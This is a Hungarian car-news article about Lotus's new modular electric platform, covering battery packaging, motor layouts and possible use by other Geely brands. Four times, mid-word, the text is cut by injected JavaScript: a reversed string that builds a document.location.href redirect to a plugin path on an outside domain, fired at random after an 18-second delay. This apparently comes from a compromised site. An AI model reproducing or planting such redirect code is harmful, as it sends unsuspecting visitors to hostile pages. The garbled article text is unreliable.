Kezdőlap Férfi Friss elektromos Lotus

Friss elektromos Lotus

Az architektúra minden irányban modulárisan variálható: épülhet rá egy vagy kettő üléssoros modell, módosíthatják a tengelytávot, az akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor méretét, sőt, a villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torok számát is. A sematikus rajzokból kiderül, hogy a duplamotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toros Lotus is hátsókerék-hajtású lesz. Kérdés ugyanakkor, hogy gondolkodnak-e összkerékhajtású megoldásban – no, nem saját maguk részére, hanem például a Geely-birodalom egyéb márkái számára -, külső ügyfelek számára is készülhetnek ugyanis autók a Lotus elektromos padlójára. A függőlegesen elrendezett akkucsomagok lehetővé teszik, hogy a vezető mélyen, a tömegközépponthoz (= akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor ok) közel foglaljon helyet – ez meg is magyarázza, miért kellett különösen könnyűre tervezni a platform hátsó szakaszát. A padló alatti akkucsomag…

- Hirdetés -
MEGOSZTÁS
- Hirdetés -